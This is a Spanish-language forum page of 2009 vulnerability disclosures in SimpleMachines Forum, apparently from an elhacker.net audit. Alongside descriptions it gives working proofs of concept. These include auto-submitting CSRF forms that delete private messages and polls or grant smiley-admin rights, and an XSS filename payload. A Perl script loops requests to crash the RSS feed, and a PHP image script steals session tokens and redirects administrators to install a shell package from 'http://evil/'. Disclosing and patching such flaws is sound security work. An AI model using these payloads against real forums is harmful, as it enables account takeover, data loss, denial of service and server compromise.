Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - WHK

#3481
También se adjuntan los siguientes post con vulnerabilidades de SimpleMachines Forum con su descripción completa:

http://foro.elhacker.net/nivel_web/hackea_a_elhackernet_finalizado_ganador_yasion-t275475.0.html
http://foro.elhacker.net/nivel_web/backdoor_nativo_en_smf_20-t272107.0.html
http://foro.elhacker.net/nivel_web/multiples_inyecciones_sql_en_smf_1110_y_20_rc12-t270049.0.html

Notas:
El backdoor nativo fue removido del sistema a partir de la versión 2.0 rc2.
Algunos bugs fueron parchados en smf 1.1.11.
#3482
Nivel Web / Robo del tocken de sesión (II)
30 Noviembre 2009, 22:40 PM
Detalles


 
 
 
 
 
 
Descripción:Robo del tocken de sesión (II)
Descubierto por:WHK@elhacker.net
Código vulnerable:Cualquier theme que muestre el avatar en la página principal
URL Vulnerable:Todas
PoC:N/A
Afecta a:‭‬SMF 1.1.10 y 2.0 RC2



Descripción

El problema está en que cada ves que haces una petición GET con tu token en
la url estás enviando tu hash que te protege ante ataques de tipo CSRF a
todas las direcciones de cada imagen mostrada.

Cuando las imagenes de un theme son locales no hay problema porque el token
queda guardado en los logs de acceso de tu servidor pero cuando smf muestra
alguna imagen externa estarás enviando directamente tu token a ese servidor.

¿Un ejemplo?
Hay themes que ponen tu avatar en la parte superior del foro en el
encabezado. Bastaría con que alguien utilize una imagen que esté alojada en
tu servidor para lanzarle un ataque de tipo CSRF de cualquier tipo
ejecutando acciones de forma arbitraria vulnerando cualquier tipo de cuenta
inclusive la de administración.

Nota de sirdarckcat
Citares un bug en algunos themes (el default no es vulnerable) y solo explotable si el
usuario pone su avatar en un servicio de hosting de imagenes que controla un
atacante.. la peligrosidad es baja creo yo..
#3483
Nivel Web / CSRF en las reglas de mensajes
30 Noviembre 2009, 22:37 PM
Detalles


 
 
 
 
 
 
Descripción:CSRF en las reglas de mensajes
Descubierto por:brlvldvlsmrtnz@gmail.com
Código vulnerable:N/A
URL Vulnerable:http://localhost/SMF/index.php?action=pm;sa=manrules
PoC:N/A
Afecta a:‭‬SMF 2.0 RC2



Descripción

Este CSRF permitiría hacer cosas como que el usuario afectado borrara
automáticamente los MPs de otro usuario determinado.
La vulnerabilidad está en la url :
http://localhost/SMF/index.php?action=pm;sa=manrules
este POC que crea una regla que borra todos los mensajes que provengan
del user admin:

Código (html4strict) [Seleccionar]
<html>
<head>
<title> New Poc </title>
</head>
<body>
<form name=POC method=POST action=http://localhost/SMF/index.php?action=pm;sa=manrules;save;rid=0>
<input type=hidden value="Regla creada por CSRF" name=rule_name>
<input type=hidden name=ruletype[0] value=mid>
<input type=hidden name=ruledef[0] value=admin>
<input type=hidden name=acttype[0] value=del>
<input type=hidden name=save >
</form>
<script>
document.POC.submit();
</script>
</body>
</html>
#3484
Nivel Web / XSS en la subida de archivos
30 Noviembre 2009, 22:32 PM
Detalles


 
 
 
 
 
 
Descripción:XSS en la subida de archivos
Descubierto por:ysk.sft@gmail.com
Código vulnerable:N/A
URL Vulnerable:N/A
PoC:N/A
Afecta a:‭‬SMF 2.0 RC2



Descripción

Al subir archivos mediante el upload de los post si uno modifica las
cabezeras para modificar el nombre del archivo y metes codigo(como <a
href='‭‬javascript:alert(0);' >test.php) , este se ejecutara cuando modificas
el post y cuando se ve por
index.php?action=profile;area=showposts;sa=attach;u=IDUSER los archivos
subidos.

Saludos.
#3485
Nivel Web / DoS en el acceso al foro
30 Noviembre 2009, 22:23 PM
Detalles


 
 
 
 
 
 
Descripción:DoS en el acceso al foro
Descubierto por:sirdarckcat@elhacker.net
Código vulnerable:Sources/QueryString.php;108 , Sources/QueryString.php:126 y Sources/QueryString.php:112
URL Vulnerable:index.php?http:// o index.php?1=1
PoC:Cookie: GLOBALS
Afecta a:‭‬SMF 2.0 RC2



Descripción

Por la siguiente linea:
Código (php) [Seleccionar]
       if (isset($_REQUEST['GLOBALS']) || isset($_COOKIE['GLOBALS']))
               die('Invalid request variable.');


http://code.google.com/p/smf2-review/source/browse/trunk/Sources/QueryString.php#108

Si podemos poner una cookie llamada GLOBALS el usuario no podra entrar al
foro.. no es explotable per-se porque necesitamos una manera de poner dicha
cookie.. y si podemos poner cookies es mas facil denegar el acceso con
cookies largas, pero bueno..

Lo mismo va para parametros con numeros:
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/QueryString.php#112

Código (php) [Seleccionar]
       foreach (array_merge(array_keys($_POST), array_keys($_GET),
array_keys($_FILES)) as $key)
               if (is_numeric($key))
                       die('Numeric request keys are invalid.');


Eso es para evitar problemas de un bug que habia en unset()..
no es tan peligroso ya pero pues..

http://tu-foro-smf/index.php?http://
wtf?
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/QueryString.php#126

si necesitan una Url que diga:
Citarheader('HTTP/1.1 400 Bad Request');

ahi la tienen, puede servir para forzar un error aveces..
#3486
Nivel Web / ReDoS en htmltrim
30 Noviembre 2009, 22:15 PM
Detalles


 
 
 
 
 
 
Descripción:ReDoS en htmltrim
Descubierto por:sirdarckcat@elhacker.net
Código vulnerable:Sources/Load.php:198
URL Vulnerable:N/A
PoC:smfFunc['htmltrim']('x                                         y');
Afecta a:‭‬SMF 1.1.10 y 2.0 RC2



Descripción

http://code.google.com/p/smf2-review/source/browse/trunk/Sources/Load.php#198
smfFunc['htmltrim']('x                                         y');

deberia causar un DoS en PREG.. este puede causar problemas a futuro (como
con http://www.google.com/::((((((((((((((((((((((( )

prueben con:
Código (php) [Seleccionar]
preg_replace('~^(?:[ \t\n\r\x0B\x00]| )+|(?:[ \t\n\r\x0B\x00]|
)+$~u','','x'.str_repeat(' ',15).'y');


deberia regresarles un string vacio.. hay que checar donde se usa esta
funcion para ver si podemos abusar del hecho que regrese un string vacio.

Saludos!!
#3487
Nivel Web / Robo del token de sesión
30 Noviembre 2009, 22:09 PM
Detalles


 
 
 
 
 
 
Descripción:Robo del token de sesión
Descubierto por:WHK@elhacker.net
Código vulnerable:Sources/Post.php:815 y Themes/classic/Display.template.php:407
URL Vulnerable:N/A
PoC:N/A
Afecta a:‭‬SMF 1.1.10 y 2.0 RC2



Descripción

Esta vulnerabilidad permite el robo de tu hash que evita cualquier tipo de
ataque CSRF, esto significa que si logras obtener dicho hash podrás
realizar cualquier tipo de acción arbitraria.

Para demostrar este bug hacemos un post cualquiera en nuestro foro de
pruebas, luego vamos a ese post y le hacemos click en el botón "quote" o
"citar", en ese momento comenzarás a crear una respuesta al post con una
citación y si te das cuenta has incluido en la url tu token de seguridad y
mas abajo se incluyen los post anteriores INCLUYENDO código bbc interpretado.
Esto quiere decir que puedes realizar un post con una imagen enlazada a tu
servidor web, entonces cuando alguien haga una cita de un post que se
encuentre en la misma página de post tuyo se incluirá la visualización de
dicha imagen y quedará grabado tu token en mis logs de acceso.

Puedes crear un script automatizado que actue de imagen y si captura de
referencia algún token entonces será capturado y enviará una redireción
hacia un ataque de tipo CSRF incluyendo tu token bypaseando el sistema de
seguridad de smf.

El problema está en todos los themes de smf xD incluyendo el theme clásico
ya que lleva el token de forma nativa en el enlace l igual que todos los
themes.
Themes/classic/Display.template.php linea 407

También es en parte problema de la función que procesa el citado de post ya
que te exige por obligación dicho token y no debería pedirse
Sources/Post.php linea 815
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/Post.php#815

También hay que recordar las vulnerabilidades encontradas en el cual
necesitas el token del usuario.

PoC:
Código (php) [Seleccionar]
<?php

/* Evitamos un error inesperado */
error_reporting(0);

/* Imagen a visualizar */
$imagen_carnada 'http://t2.gstatic.com/images?q=tbn:MBl2gp1VvxRl2M:http://rufadas.com/wp-content/uploads/2007/04/cara-de-culo.jpg';
$servidor_shell 'http://evil/';
$mod_shell 'shell_mod.zip';

$referer $_SERVER['HTTP_REFERER'];
$referer explode(';'$referer);
/* Token formado por un hash de 32 carácteres
mas un nombre de variable al azar */
foreach($referer as $token){
 
$token explode('='$token);
 if(
strlen($token[0]) > 6){
  if(
strlen($token[1]) == 32){
   
$url_foro $_SERVER['HTTP_REFERER'];
   
$url_foro explode('index.php'$url_foro);
   
$url_foro $url_foro[0];
   
/* Apostamos a un CSRF apuntando al panel de administración */
   
header(
    
'location: '.$url_foro.'index.php?action=admin;'.
    
'area=packages;get;sa=download;byurl;package='.
    
urlencode($servidor_shell).';filename='.urlencode($mod_shell).';'.
    
$token[0].'='.$token[1]);
   exit;
  }
 }
}

/* No hay token */
header('Content-Type: image/jpeg');
echo 
file_get_contents($imagen_carnada);
exit;
?>


Nota de YST:
CitarEste bug tambien permite que se pueda olbigar a que no puedan editar un post al
postear la imagen en el mismo topic , ya que si se usa para cerrar sesion no permite
guardar el post editado .
#3488
Nivel Web / RSS DoS
30 Noviembre 2009, 22:02 PM
Detalles


 
 
 
 
 
 
Descripción:RSS DoS
Descubierto por:WHK@elhacker.net
Código vulnerable:Sources/News.php:83
URL Vulnerable:N/A
PoC:$peticion = 'GET /.xml.html;sa=news;limit=999;type=rss HTTP/1.1
Afecta a:‭‬SMF 1.1.10 y 2.0 RC2



Descripción

El bug consiste en que SMF pone como límite 256 items al momento de
visualizar el rss del foro. Si intentas visualizar las 256 entradas unas 5
veces de forma simultanea puedes hacer colapsar la base de datos y elevar
el pid a las nuves.
De todas formas este valor máximo es configurable pero por defecto viene un
valor demasiado elevado para un servidor standard compartido.

el problema se centra en el archivo Sources/News.php linea 83
Código (php) [Seleccionar]
$_GET['limit'] = empty($_GET['limit']) || (int) $_GET['limit'] < 1 ? 5 :
min((int) $_GET['limit'], 255);


Aunque mas abajo si impone un límite que puedes manupular desde el panel de
administración pero estos 255 que al final se transforman en 256 van por
defecto.

Nota: si haces un fork cada 10 conexiones simultaneas terminas cosinando
huevos fritos sobre el procesador del servidor.

Prueba de concepto:
Código (perl) [Seleccionar]
#!/usr/bin/perl

# Prueba de concepto realizado para testear la vulnerabilidad de
# simplemachines forum 2.0 RC2 y 1.1.10.
# SimpleAudit elhacker.net

use IO::Socket;

# autoflush activado
$| = 1;

$host = 'foro.indeseable.ejemplo';

$peticion = 'GET /.xml.html;sa=news;limit=999;type=rss HTTP/1.1
Host: '.$host.'
User-Agent: PEC-Matic V1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Connection: close

';

print "Conectando... \n";

for(;;) {
$socket = IO::Socket::INET->new(
 PeerAddr => $host,
 PeerPort => 80,
 Proto => 'tcp',
 Timeout  => 1
);
if($socket){
 print '.';
 $socket->send($peticion);
 close($socket);
}else{
 print 'x';
}
}

print "\nTerminado.\n";
exit(1);
#3489
Detalles


 
 
 
 
 
 
Descripción:CSRF permite elevar privilegios de usuarios normales para modificar los smileys
Descubierto por:ysk.sft@gmail.com
Código vulnerable:N/A
URL Vulnerable:N/A
PoC:N/A
Afecta a:‭‬SMF 2.0 RC2



Descripción

El CSRF se encuentra en /index.php?action=admin;area=smileys;save;sa=settings
y permite hacer que los usuarios normales tengan poderes para modificar los
smileys.

Aparte de modificar los smileys tambien se puede aprovechar para ver la
ruta de los archivos algo como un path discloure en
/index.php?action=admin;area=smileys;sa=settings.

Código (html4strict) [Seleccionar]
<form id="id_formulario"
action="http://localhost/foro2/index.php?action=admin;area=smileys;save;sa=settings
method = "POST" target = "asdf" style="visibility:hidden;">
<input name="manage_smileys[0]" value="on" />
</form>
#3490
Nivel Web / CSRF permite borrar una encuesta
30 Noviembre 2009, 21:56 PM
Detalles


 
 
 
 
 
 
Descripción:CSRF permite borrar una encuesta
Descubierto por:ysk.sft@gmail.com
Código vulnerable:N/A
URL Vulnerable:N/A
PoC:N/A
Afecta a:‭‬SMF 2.0 RC2



Descripción

Consigue borrar cualquier encuesta .
Código (html4strict) [Seleccionar]
<form id="id_formulario"
action="http://localhost/foro2/index.php?action=removepoll;topic=1.0 method = "POST"
target = "asdf" >